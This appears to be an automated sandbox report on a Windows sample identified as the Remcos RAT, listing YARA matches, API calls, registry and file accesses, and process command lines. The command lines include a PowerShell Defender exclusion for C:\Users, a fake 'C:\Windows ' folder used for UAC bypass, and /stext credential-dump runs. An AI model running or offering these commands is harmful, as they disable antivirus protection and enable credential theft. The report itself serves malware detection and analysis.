Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@39/16@7/3

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 27_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

27_2_004182CE

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12347952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

24_2_12347952

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040A7F18 GetDiskFreeSpaceA,

0_2_040A7F18

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

24_2_1233F474

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040B6D0C CoCreateInstance,

0_2_040B6D0C

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

24_2_1234B4A8

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

24_2_1234AA4A

Source: C:\Users\user\Desktop\midyear_statement.exe

File created: C:\Users\Public\Libraries\Null

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqjdho.kwp.ps1

Jump to behavior

Source: C:\Windows \System32\2506803.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: 8SG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: 8SG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: dMG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PSG	24_2_0059F7A7

Source: C:\Users\user\Desktop\midyear_statement.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\Libraries\wkrriuhD.pif

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\Public\Libraries\wkrriuhD.pif

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\midyear_statement.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001C.00000002.1384508766.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wkrriuhD.pif, 0000001B.00000002.1406746333.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: midyear_statement.exe	ReversingLabs: Detection: 26%
Source: midyear_statement.exe	Virustotal: Detection: 31%

Source: C:\Users\user\Desktop\midyear_statement.exe

File read: C:\Users\user\Desktop\midyear_statement.exe

Jump to behavior

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\midyear_statement.exe "C:\Users\user\Desktop\midyear_statement.exe"
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"
Source: C:\Windows \System32\2506803.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
Source: unknown	Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"	Jump to behavior
Source: C:\Windows \System32\2506803.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif

Source: C:\Users\user\Desktop\midyear_statement.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Source: midyear_statement.exe

Static file information: File size 1265664 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
